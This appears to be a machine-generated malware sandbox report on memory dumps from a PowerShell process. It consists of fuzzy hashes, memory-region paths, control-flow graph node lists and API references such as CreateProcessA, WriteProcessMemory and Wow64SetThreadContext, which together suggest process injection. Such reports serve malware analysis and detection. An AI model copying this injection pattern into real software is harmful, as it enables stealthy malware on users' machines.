                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: tPsq$tPsq
                                                                                                        • API String ID: 0-2620299843
                                                                                                        • Opcode ID: a5e46d65149ef2d12c80801b67f41f861e80906abe7b5a4f047b251b8319da0e
                                                                                                        • Instruction ID: c3c4438d731ed230c354db9814456dff250c44ffc7f14a893cceb2aa299eb5bb
                                                                                                        • Opcode Fuzzy Hash: a5e46d65149ef2d12c80801b67f41f861e80906abe7b5a4f047b251b8319da0e
                                                                                                        • Instruction Fuzzy Hash: A6412BB1B053586FCB209B688C11BAEBFA5EF85710F58845AE5449F3C2DA71DC4187E2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $sq$$sq
                                                                                                        • API String ID: 0-1184984226
                                                                                                        • Opcode ID: 27b1e6e93a04fbfd59d0e65c2740776ee8c7a5dfd67dc128d26f6914aa63dfb8
                                                                                                        • Instruction ID: cddc4846bb390990831a7077da062fea9efcd08e3f6b302cab20505a9d11d324
                                                                                                        • Opcode Fuzzy Hash: 27b1e6e93a04fbfd59d0e65c2740776ee8c7a5dfd67dc128d26f6914aa63dfb8
                                                                                                        • Instruction Fuzzy Hash: C011B2F5208346AFDB228A54D9409EBBFB5FF92214B1C807BE5048B252DB36DC44C761

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 4266 71c8bdb-71c8c56 4294 71c8c59 call 7204620 4266->4294 4295 71c8c59 call 7204628 4266->4295 4271 71c8c5b-71c8c68 4272 71c8c6e-71c8c79 4271->4272 4273 71c7c4a-71c7c7d 4271->4273 4274 71c79ad-71c79b6 4272->4274 4275 71c8d51-71c8d80 4272->4275 4273->4275 4277 71c79bf-71c7d83 4274->4277 4278 71c79b8-71c8df3 4274->4278 4275->4274 4276 71c8d86-71c8d91 4275->4276 4276->4274 4282 71c8aac-71c8afa 4277->4282 4283 71c7d89-71c7d94 4277->4283 4278->4274 4291 71c8df9-71c8e04 4278->4291 4282->4274 4293 71c8b00-71c8b0b 4282->4293 4283->4274 4291->4274 4293->4274 4294->4271 4295->4271
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: &$(
                                                                                                        • API String ID: 0-131901980
                                                                                                        • Opcode ID: 10cac99df99a347854c27d9d24e734eb8f61d4f0e75152e97dbed7a7fa52878c
                                                                                                        • Instruction ID: 869e7a17dd2b3d0f3d5499904be9454d51a8d04d7d14ff48685758bbc31ab9f5
                                                                                                        • Opcode Fuzzy Hash: 10cac99df99a347854c27d9d24e734eb8f61d4f0e75152e97dbed7a7fa52878c
                                                                                                        • Instruction Fuzzy Hash: 1F31E5B4A11219CFDB65DFA4D845BEEBBB1BB99314F5040DAD409AB784CB719E81CF00

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 4296 71c7e50-71c7e57 4297 71c7e5d-71c7e7f 4296->4297 4298 71c87a9-71c8806 4296->4298 4299 71c79ad-71c79b6 4297->4299 4300 71c7e85-71c7e90 4297->4300 4322 71c8809 call 7204ca0 4298->4322 4323 71c8809 call 7204ca8 4298->4323 4301 71c79bf-71c7d83 4299->4301 4302 71c79b8-71c8df3 4299->4302 4300->4299 4306 71c8aac-71c8afa 4301->4306 4307 71c7d89-71c7d94 4301->4307 4302->4299 4317 71c8df9-71c8e04 4302->4317 4306->4299 4320 71c8b00-71c8b0b 4306->4320 4307->4299 4317->4299 4320->4299 4321 71c880b-71c881b 4322->4321 4323->4321
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: !$9
                                                                                                        • API String ID: 0-1747164267
                                                                                                        • Opcode ID: 662fb04bf626071a496eb4544886b0e5795c23a0d24425b66ec939b65b824ccb
                                                                                                        • Instruction ID: 6c8c1cc0567bdb7ca4cfcc0505c44d6e758e8c70bf9065c95b5d9f8db9aaae7c
                                                                                                        • Opcode Fuzzy Hash: 662fb04bf626071a496eb4544886b0e5795c23a0d24425b66ec939b65b824ccb
                                                                                                        • Instruction Fuzzy Hash: 32113A7490021ACFDB25DF64D896BEDBBB1BB85314F4041EAC019AB291DB706E81CF40

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 4324 6f73900-6f73932 4325 6f739d9-6f739e8 4324->4325 4326 6f73938-6f7394e 4324->4326 4331 6f739ea-6f73a22 4325->4331 4332 6f73979 4325->4332 4327 6f73953-6f73966 4326->4327 4328 6f73950 4326->4328 4327->4325 4333 6f73968-6f73975 4327->4333 4328->4327 4334 6f73a24-6f73a2b 4331->4334 4335 6f73a68 4331->4335 4336 6f7397a-6f7398c 4332->4336 4333->4336 4337 6f73977 4333->4337 4339 6f73a2d-6f73a3a 4334->4339 4340 6f73a3c 4334->4340 4338 6f73a6b-6f73aa7 4335->4338 4336->4325 4343 6f7398e-6f73998 4336->4343 4337->4336 4352 6f73b23-6f73b2e 4338->4352 4353 6f73aa9-6f73ab2 4338->4353 4342 6f73a3e-6f73a40 4339->4342 4340->4342 4346 6f73a47-6f73a49 4342->4346 4347 6f73a42-6f73a45 4342->4347 4350 6f739a6-6f739d8 4343->4350 4351 6f7399a-6f7399c 4343->4351 4348 6f73a4b-6f73a58 4346->4348 4349 6f73a5a 4346->4349 4354 6f73a66 4347->4354 4355 6f73a5c-6f73a5e 4348->4355 4349->4355 4351->4350 4356 6f73b30-6f73b33 4352->4356 4357 6f73b3d-6f73b5f 4352->4357 4353->4352 4358 6f73ab4-6f73aba 4353->4358 4354->4338 4355->4354 4356->4357 4367 6f73b65-6f73b6e 4357->4367 4368 6f73c20-6f73c31 4357->4368 4361 6f73d54-6f73dc1 4358->4361 4362 6f73ac0-6f73acd 4358->4362 4377 6f73dc3-6f73dcf 4361->4377 4378 6f73dd1-6f73e03 WriteProcessMemory 4361->4378 4364 6f73acf-6f73af9 4362->4364 4365 6f73b1a-6f73b21 4362->4365 4379 6f73b16 4364->4379 4380 6f73afb-6f73afe 4364->4380 4365->4352 4365->4358 4367->4361 4371 6f73b74-6f73ba9 4367->4371 4387 6f73bc3-6f73bd6 4371->4387 4388 6f73bab-6f73bc1 4371->4388 4377->4378 4381 6f73e0a 4378->4381 4379->4365 4382 6f73b00-6f73b03 4380->4382 4383 6f73b0a-6f73b13 4380->4383 4385 6f73e13-6f73e27 4381->4385 4386 6f73e0c-6f73e12 4381->4386 4382->4383 4386->4385 4389 6f73bd8-6f73bdf 4387->4389 4388->4389 4392 6f73c04-6f73c1a 4389->4392 4393 6f73be1-6f73bf2 4389->4393 4392->4367 4392->4368 4393->4392 4396 6f73bf4-6f73bfd 4393->4396 4396->4392
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2856555642.0000000006F70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F70000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_6f70000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: b2e5e0c08d5d7751eb17d9541a8693964cf7031c7aa9d2fe3a005bb5d41065d7
                                                                                                        • Instruction ID: ed2046c1a416aab0c87ba0b12b2193b375fa0fc7909084526eca9cb638aa06af
                                                                                                        • Opcode Fuzzy Hash: b2e5e0c08d5d7751eb17d9541a8693964cf7031c7aa9d2fe3a005bb5d41065d7
                                                                                                        • Instruction Fuzzy Hash: EEE1F475E00259AFDB54CF98D884A9EFBB2FF48310F24855AE819AB351C731ED81DB90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq
                                                                                                        • API String ID: 0-1075809040
                                                                                                        • Opcode ID: 10f2ec01664a4a61f437ff8966b85cf131b1cc1d04857b3b955b1d9224481b48
                                                                                                        • Instruction ID: 9d13f83f7ac3aea2ad89fc9702a052bf9b2a0f98a70054a1a7affcbf9880d96b
                                                                                                        • Opcode Fuzzy Hash: 10f2ec01664a4a61f437ff8966b85cf131b1cc1d04857b3b955b1d9224481b48
                                                                                                        • Instruction Fuzzy Hash: 0E121BB4A00215AFDB14CB98C590EADBBB2BF85314F54C46AE905AF355CB31FC42CB91
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq
                                                                                                        • API String ID: 0-1075809040
                                                                                                        • Opcode ID: fc9c255f447ce4e310a385bb109fab800221ea26b6840ef4da642eb3b4de706d
                                                                                                        • Instruction ID: baaac9d00ab8786db38b335442c7d3ff2727a2fe336659f3a37f551d37d3c66c
                                                                                                        • Opcode Fuzzy Hash: fc9c255f447ce4e310a385bb109fab800221ea26b6840ef4da642eb3b4de706d
                                                                                                        • Instruction Fuzzy Hash: 7C1209B4A01215EFDB24CB58C590EAEBBB2BF89314F15C56AE805AB355CB31E842CB51
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0720379A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: 737946b6e0bc25fc30aa008f0dd46f941c8e2651c88bcc9a4a088ee3443497a5
                                                                                                        • Instruction ID: 6464e6fa84d5279d2da23b22066cc729f1d11451906f8bfd8e19b0b8aecf8320
                                                                                                        • Opcode Fuzzy Hash: 737946b6e0bc25fc30aa008f0dd46f941c8e2651c88bcc9a4a088ee3443497a5
                                                                                                        • Instruction Fuzzy Hash: 058155B1D1024A9FDB10CFA9C8857EEBBF1BF49320F14812DE855A7396DB749881CB91
                                                                                                        APIs
                                                                                                        • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0720379A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CreateProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 963392458-0
                                                                                                        • Opcode ID: c27fd03c4561ad3382f02c6da93ee9c07b3ce00c378c355aafbee95721eb4725
                                                                                                        • Instruction ID: 7bfca4bc5266967c8719182b8160d3d52a54aa5a3c0bf795be8c153fe5e6a8be
                                                                                                        • Opcode Fuzzy Hash: c27fd03c4561ad3382f02c6da93ee9c07b3ce00c378c355aafbee95721eb4725
                                                                                                        • Instruction Fuzzy Hash: 8E8134B1D1024A9FDB10CFA9C8857AEBBF5BF48310F14852DE815A7396DB749881CB91
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07203E0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 371c983ce6916655aec1c5ed666d18d715a0dd7fbb21bdffcb3576d55782e6f9
                                                                                                        • Instruction ID: 3db9ea6ad51f8f11687c0f4820eaa7149d996b4e3f35df04be4c9b66efff0e03
                                                                                                        • Opcode Fuzzy Hash: 371c983ce6916655aec1c5ed666d18d715a0dd7fbb21bdffcb3576d55782e6f9
                                                                                                        • Instruction Fuzzy Hash: 284119B1D1020A9FDB04DFA9D481BEEBBF5EF48310F14846AE419A7341DB74A945CFA0
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072046B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 2e65022ba67ad3adde45e54a24d8df8d8770a427d0b2698b2017758c0a24b937
                                                                                                        • Instruction ID: d53254556bc3f97d23c6e2da7eb1a4c3d9fd4bcf8adabc7ae8c62b05cdcdaa5e
                                                                                                        • Opcode Fuzzy Hash: 2e65022ba67ad3adde45e54a24d8df8d8770a427d0b2698b2017758c0a24b937
                                                                                                        • Instruction Fuzzy Hash: D52159B590034A9FCB10DFA9C881BDEBBF5FF48320F10842AE919A7240D7749541CBA0
                                                                                                        APIs
                                                                                                        • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 072046B8
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MemoryProcessWrite
                                                                                                        • String ID:
                                                                                                        • API String ID: 3559483778-0
                                                                                                        • Opcode ID: 32205c546f9609255cf28f5980f39437c4a1fe88e1c8f081f3c6e5c13702aea1
                                                                                                        • Instruction ID: 0a97d38a1110564dbeb4b4a9fd4d4c4414b2bf01f16fcd2db05825514e6c3f8b
                                                                                                        • Opcode Fuzzy Hash: 32205c546f9609255cf28f5980f39437c4a1fe88e1c8f081f3c6e5c13702aea1
                                                                                                        • Instruction Fuzzy Hash: 2C2157B591034A9FCB10DFA9C981BDEBBF5FF48320F10842AE919A7340D7789940CBA0
                                                                                                        APIs
                                                                                                        • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07203E0E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858569819.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7200000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ContextThreadWow64
                                                                                                        • String ID:
                                                                                                        • API String ID: 983334009-0
                                                                                                        • Opcode ID: 3847abd0e6d9bada43722a12ed04d5c5a47dd411e82cd859d553d5d90dfb61cb
                                                                                                        • Instruction ID: 7181488754b175b32f5832b7351f6f8ba152d7ffcaeca0303cd015a76de57510
                                                                                                        • Opcode Fuzzy Hash: 3847abd0e6d9bada43722a12ed04d5c5a47dd411e82cd859d553d5d90dfb61cb
                                                                                                        • Instruction Fuzzy Hash: 8D211AB19103099FDB10DFAAC5857EEBBF4EF48324F14842AD519A7241CB789945CFA1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: (wq
                                                                                                        • API String ID: 0-1062398946
                                                                                                        • Opcode ID: 0835204fa13672af5bb1d5c042c5fd1fb9f8ff85468fefd01a84921314f405c2
                                                                                                        • Instruction ID: 1fc784cbbc787d63269d04a1dc1602d7326ec478a9014a7a215c2860dedf3e1d
                                                                                                        • Opcode Fuzzy Hash: 0835204fa13672af5bb1d5c042c5fd1fb9f8ff85468fefd01a84921314f405c2
                                                                                                        • Instruction Fuzzy Hash: C95126B1A106269FCB12CF28C48056AFBB5FF86320B158296D8299B341D730FD56CBD0
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: 4'sq
                                                                                                        • API String ID: 0-1075809040
                                                                                                        • Opcode ID: ef416dc02393692224dea95739fbab1e77394cefde61b128e02a2765bcfef485
                                                                                                        • Instruction ID: 3aab209dbe82d4dda4bedb320fd67f054c8c0921f1c8c6daf6379ad6711bd8d7
                                                                                                        • Opcode Fuzzy Hash: ef416dc02393692224dea95739fbab1e77394cefde61b128e02a2765bcfef485
                                                                                                        • Instruction Fuzzy Hash: 283104B0A25346AFCF118A2484143FE7BA1BF85210F548477D40CCB1D2FB79C981CBA2
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: p<sq
                                                                                                        • API String ID: 0-1142556907
                                                                                                        • Opcode ID: e30f6d3dba2eec60eebfb1acfac6f4cf364cf7c51f5a28464afb75820c0f9ca2
                                                                                                        • Instruction ID: d2d6c0f41dc47da3eb821ac328db827f05ab165e8639ce91301a14c1b001598a
                                                                                                        • Opcode Fuzzy Hash: e30f6d3dba2eec60eebfb1acfac6f4cf364cf7c51f5a28464afb75820c0f9ca2
                                                                                                        • Instruction Fuzzy Hash: 202171B1318296AFDB168F29C8409AA7FF5EF8A310F054096FC45CB361CA75DC51EB20
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: F
                                                                                                        • API String ID: 0-1304234792
                                                                                                        • Opcode ID: daaddf2fea6f65caae34fddc18fcbb84925aaeb1015c4232c37b63ed5d85a473
                                                                                                        • Instruction ID: 968b72de856b047f71b6d0af20ccad95c66b101e75b779753d7d9f84a310f575
                                                                                                        • Opcode Fuzzy Hash: daaddf2fea6f65caae34fddc18fcbb84925aaeb1015c4232c37b63ed5d85a473
                                                                                                        • Instruction Fuzzy Hash: 1C313874A0122ACFDB61DF64C849BD9BBB1FB49304F4080E9E409AB390DB709E85DF01
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: $
                                                                                                        • API String ID: 0-3993045852
                                                                                                        • Opcode ID: e0ffe5c8314e4e53dc9011e4016f51047db1e738c48ab87cada9152b935a7a19
                                                                                                        • Instruction ID: f84212d5158cfaa86e6f9ab2c5d6f8f3894c13de1f646616b58edfa90b802923
                                                                                                        • Opcode Fuzzy Hash: e0ffe5c8314e4e53dc9011e4016f51047db1e738c48ab87cada9152b935a7a19
                                                                                                        • Instruction Fuzzy Hash: 0E31F274A41229CFEB64DF68C859BE9BBB1FB89300F5040D9D409AB784CB71AE81CF41
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .
                                                                                                        • API String ID: 0-248832578
                                                                                                        • Opcode ID: adf8bd9fe2ab14d5db4587987f98ae1223c676d846ec84d66a3c8238a4b3c46c
                                                                                                        • Instruction ID: 2dcbf8ad09ba7d9091ee81bfc024043806066253b20238d7af04f8ca4e07f2d0
                                                                                                        • Opcode Fuzzy Hash: adf8bd9fe2ab14d5db4587987f98ae1223c676d846ec84d66a3c8238a4b3c46c
                                                                                                        • Instruction Fuzzy Hash: 85F0F978915219CFDB24DF60C859BA9BBB1FB45314F1091EE880967291C7789E86CF41
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: Tesq
                                                                                                        • API String ID: 0-136783293
                                                                                                        • Opcode ID: 948fe45d6055eff4e9414dc928efb265ecbf180a0af033bf29f391b4d0161825
                                                                                                        • Instruction ID: 91820f7c48e21da100fbd34bf0fcbc892092ef136b7407e90275f8f1fc512f49
                                                                                                        • Opcode Fuzzy Hash: 948fe45d6055eff4e9414dc928efb265ecbf180a0af033bf29f391b4d0161825
                                                                                                        • Instruction Fuzzy Hash: EF011974E1016A8FCB68DF68D9907ADB7B2BF88300F5040E99909A7780DF305E849F90
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: .
                                                                                                        • API String ID: 0-248832578
                                                                                                        • Opcode ID: 0a4327d6ae4bbce7202cbebcc37114c095b8dac2e0e4e4f1ac9a2cd250e83fc1
                                                                                                        • Instruction ID: bc641760976396152098ebf292a0e2fcff5ca64859887403960302edb07cc13c
                                                                                                        • Opcode Fuzzy Hash: 0a4327d6ae4bbce7202cbebcc37114c095b8dac2e0e4e4f1ac9a2cd250e83fc1
                                                                                                        • Instruction Fuzzy Hash: 9DF05838900219CFDB14DF60C899BACBBB1EB85310F1080EA88096B391CB389F86CF40
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858146352.00000000071C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_71c0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: A
                                                                                                        • API String ID: 0-3554254475
                                                                                                        • Opcode ID: b27c31bcd94314be72eb21cae4df483a49edd4af236f8fcde0ef8d9c98b37589
                                                                                                        • Instruction ID: d0fd6c605f0a5e6d7c4e304b72cc1e34c708af0b97e939ad08f57bf2f1a0c887
                                                                                                        • Opcode Fuzzy Hash: b27c31bcd94314be72eb21cae4df483a49edd4af236f8fcde0ef8d9c98b37589
                                                                                                        • Instruction Fuzzy Hash: A2F01C3180160ADBCF11DFA4D805AD9B771FF59300F108689E9192B650DB34AA95DF80
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2858630208.0000000007220000.00000040.00000800.00020000.00000000.sdmp, Offset: 07220000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_7220000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID: y
                                                                                                        • API String ID: 0-4225443349
                                                                                                        • Opcode ID: a582007d6470ba563282e2b676c15fb8925a1087762f19ee960958b7d3146822
                                                                                                        • Instruction ID: 226b32ff812e9d14c0688136e5b3664fbf1b7df7ecc023311d538acac566e3c1
                                                                                                        • Opcode Fuzzy Hash: a582007d6470ba563282e2b676c15fb8925a1087762f19ee960958b7d3146822
                                                                                                        • Instruction Fuzzy Hash: D4D09EB0B35669DFDB25CB14CD447997B71AB41301F0076D5900966240DAB45B859F52
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2861127100.00000000075A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075A0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_75a0000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 76df232fd2afdfb5b1caad46634d36a840df8ed23fd1185412dd4e741e19a381
                                                                                                        • Instruction ID: 9cbdba968153adff6e2b76d512d1955af99a87816a775efdd389e929e2954bc5
                                                                                                        • Opcode Fuzzy Hash: 76df232fd2afdfb5b1caad46634d36a840df8ed23fd1185412dd4e741e19a381
                                                                                                        • Instruction Fuzzy Hash: 91323CB4B002159FDB54CB58C850BA9BBB2BF89314F54C0AAD9099F356CB71ED82CF91
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2824010928.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_4700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: feb87cabb496ede6d997c698215bfdd01dc3b0089a69a1d2e70cf6c934afc990
                                                                                                        • Instruction ID: c9510941395ae57444b67a4217fa6eccf955378ce1521ed4139abb474049338a
                                                                                                        • Opcode Fuzzy Hash: feb87cabb496ede6d997c698215bfdd01dc3b0089a69a1d2e70cf6c934afc990
                                                                                                        • Instruction Fuzzy Hash: C6E15A74A06248DFDB05CFA8D584A9DBBF2EF49310F24C559E855AB392CB30ED46CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2824010928.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_4700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 9ef15c5abd8c732e98e95c2dc9688ac80ed0330141473b94025f54a17bf7e00f
                                                                                                        • Instruction ID: 717665e02cfad7241a9011dbbe99ba6c0634324232094ab6dea04a757a45d92b
                                                                                                        • Opcode Fuzzy Hash: 9ef15c5abd8c732e98e95c2dc9688ac80ed0330141473b94025f54a17bf7e00f
                                                                                                        • Instruction Fuzzy Hash: E3E10674A05208DFDB15CF98C494AADBBF2FF88310F248159E844AB391DB70ED86CB90
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000004.00000002.2824010928.0000000004700000.00000040.00000800.00020000.00000000.sdmp, Offset: 04700000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_4_2_4700000_powershell.jbxd
                                                                                                        Similarity
                                                                                                        • API ID:
                                                                                                        • String ID:
                                                                                                        • API String ID:
                                                                                                        • Opcode ID: 5022352adde2ef84f2c942935ac6742970ff56111b94682105d801fc68082f05
                                                                                                        • Instruction ID: f49495cbf6279aabd0ced66ab34d95f36293bfd510272a3145586e093308d8c6
                                                                                                        • Opcode Fuzzy Hash: 5022352adde2ef84f2c942935ac6742970ff56111b94682105d801fc68082f05
